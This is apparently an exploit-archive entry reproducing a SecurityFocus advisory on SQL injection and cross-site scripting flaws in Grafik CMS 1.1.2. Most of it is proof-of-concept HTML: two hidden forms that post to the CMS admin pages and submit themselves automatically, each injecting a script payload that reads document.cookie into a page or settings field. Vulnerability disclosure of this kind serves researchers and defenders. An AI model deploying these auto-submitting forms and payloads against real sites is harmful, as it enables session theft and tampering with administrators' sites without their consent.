34 lines
No EOL
1.8 KiB
HTML
34 lines
No EOL
1.8 KiB
HTML
source: https://www.securityfocus.com/bid/41227/info
|
|
|
|
Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
|
|
|
|
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Grafik CMS 1.1.2 is vulnerable; other versions may be affected.
|
|
|
|
<form action="http://www.example.com/admin/admin.php?action=edit_page&id=1" method="post" name="main" >
|
|
<input type="hidden" name="page_title" value="page title" />
|
|
<input type="hidden" name="page_menu" value='descr"><script>alert(document.cookie)</script>' />
|
|
<input type="hidden" name="id" value="1" />
|
|
<input type="hidden" name="page_content" value="some page content" />
|
|
<input id="sbmt" type="submit" name="submit" value="Modifier" />
|
|
</form>
|
|
<script>
|
|
document.getElementById('sbmt').click();
|
|
</script>
|
|
|
|
|
|
<form action="http://www.example.com/admin/admin.php?action=settings" method="post" name="main" >
|
|
<input type="hidden" name="name" value="site title" />
|
|
<input type="hidden" name="admin_mail" value="example@example.com" />
|
|
<input type="hidden" name="keywords" value="" />
|
|
<input type="hidden" name="description" value='descr"><script>alert(document.cookie)</script>' />
|
|
<input type="hidden" name="site_url" value="http://www.example.com/" />
|
|
<input type="hidden" name="seo_url" value="0" />
|
|
<input type="hidden" name="mailing" value="1" />
|
|
<input type="hidden" name="template" value="templates/default" />
|
|
<input id="sbmt" type="submit" name="submit" value="Valider" />
|
|
</form>
|
|
<script>
|
|
document.getElementById('sbmt').click();
|
|
</script> |